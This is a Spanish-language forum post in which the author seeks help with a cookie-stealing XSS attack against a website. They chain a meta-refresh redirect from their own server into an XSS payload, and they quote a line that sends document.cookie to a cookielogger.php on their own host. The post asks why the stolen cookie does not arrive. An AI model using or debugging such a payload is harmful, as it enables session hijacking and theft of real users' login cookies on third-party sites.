Voy de problema en problema
Gracias a el método de yeikos he conseguido que me cargue las funciones del javascript con letras. Vale os voy a explicar así un poco para que sepaís que pretendo hacer:
Tengo una web "X" a la que le quiero sacar la cookie. Como en el foro no puedo utilizar
<script></script>, se me ocurrió poner un link a un servidor mío a una página "Y" que con un meta refresh redirija a la página "X" pero con el XSS ya introducido en la URL.
Vale hasta ahora bien, todo funciona perfectamente hasta que llega a la mitad del script:
document.location=http://miweb.com/cookielogger.php?cookie + document.cookie
Vale el
document.location lo realiza correctamente porque me redirige a cookielogger.php pero la cookie no aparece por ningún lado. Le he puesto un
print para comprobarlo y me aparace ==> document.cookie. La cookie sigue desaparecida x'D
También he probdo con
document.location=http://miweb.com/cookielogger.php?cookie= document.cookie, pero nada me sigue apareciendo document.cookie en vez de la cookie.
Me he quemado ya la cabeza de tanto pensar en que puede fallar y no se qué es, haber si me podéis echar una mano. Se me ha ocurrido de que al irse a mi hosting al no haber cookie no me la muestre, pero como le hago el location al otro hosting sí debería de aparecer :S no se, estoy confuso :S